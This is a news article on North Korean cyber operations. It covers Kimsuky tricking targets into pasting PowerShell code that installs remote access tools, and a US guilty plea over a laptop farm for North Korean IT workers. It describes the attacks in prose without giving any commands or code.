A N. Korea-linked threat player known as Kimsuky has been seen using a new method that involves conning targets into running PowerShell as an administrator & then instructing them to paste & run malicious code provided by them.
“To execute this tactic, the threat actor masquerades as a S. Korean Govt. official & over time builds rapport with a target before sending a spear-phishing email with an [sic] PDF attachment,” the Microsoft Threat Intelligence team said in a series of posts shared on X.
PDF document
To read the supposed PDF document, victims are persuaded to click a URL containing a list of steps to register their Windows system. The registration link urges them to launch PowerShell as an administrator & copy/paste the displayed code lines into the terminal & execute it.
If the victim follows through, the malicious code downloads & installs a browser-based remote desktop tool, along with a certificate file with a hardcoded PIN from a remote server.
“The code then sends a web request to a remote server to register the victim device using the downloaded certificate & PIN. This allows the threat player to access the device & conduct data exfiltration,” Microsoft commented.
Limited Attacks
They mentioned that it observed the use of this approach in limited attacks since Jan. 2025, describing it as a ‘departure’ from the threat player’s usual methodology.
It is worth noting that the Kimsuky is not the only N. Korean hacking group to adopt the compromise strategy.
In Dec. 2024, it was revealed that threat players linked to the ‘Contagious Interview’ campaign are tricking users into copying & executing a malicious command on their Apple macOS systems via the Terminal app – so as to address a supposed problem with accessing the camera & microphone through the web browser.
Such attacks, along with those that have embraced the so-called ClickFix method, have taken off in a big way in recent months, in part driven by the fact that they rely on the targets to infect their own machines, thereby bypassing security protections.
Laptop Farm for N. Korean IT workers
The development comes as the US Dept. of Justice (DoJ) revealed that a 48-year-old woman from Arizona pleaded guilty for her role in the fraudulent IT worker scheme that allowed N. Korean threat players to obtain remote jobs in more than 300 US companies by posing as US citizens & residents.
The activity generated over $17.1m in illicit revenue for Christina Marie Chapman & for N. Korea in violation of international sanctions between Oct. 2020 & Oct. 2023, the dept. stated.
Steal the Identities
“Chapman, an American citizen, conspired with overseas IT workers from Oct. 2020 to Oct. 2023 to steal the identities of US nationals & used those identities to apply for remote IT jobs &, in furtherance of the scheme, transmitted false documents to the Department of Homeland Security,” the DoJ said.
“Chapman & her co-conspirators obtained jobs at 100 of US companies, including Fortune 500 corporations, often through temporary staffing companies or other contracting organisations.”
Arrested
The defendant, who was arrested in May 2024, has also been accused of running a laptop farm by hosting multiple laptops at her residence to give the impression that the N. Korean workers were working from within the country, when, in reality, they were based in China & Russia & remotely connected to the companies’ internal systems.
“As a result of the conduct of Chapman & her conspirators, more than 300 US companies were impacted, more than 70 identities of US persons were compromised, on more than 100 occasions false information was conveyed to DHS, & more than 70 US individuals had false tax liabilities created in their name,” the DoJ added.
IT Worker Scheme
The increased law enforcement focus has led to an escalation of the IT worker scheme, with reports emerging of data exfiltration & extortion.
“After being discovered on company networks, N. Korean IT workers have extorted victims by holding stolen proprietary data & code hostage until the companies meet ransom demands,” the US Federal Bureau of Investigation (FBI) said in an advisory last month.
“In some instances, N. Korean IT workers have publicly released victim companies’ proprietary code.”
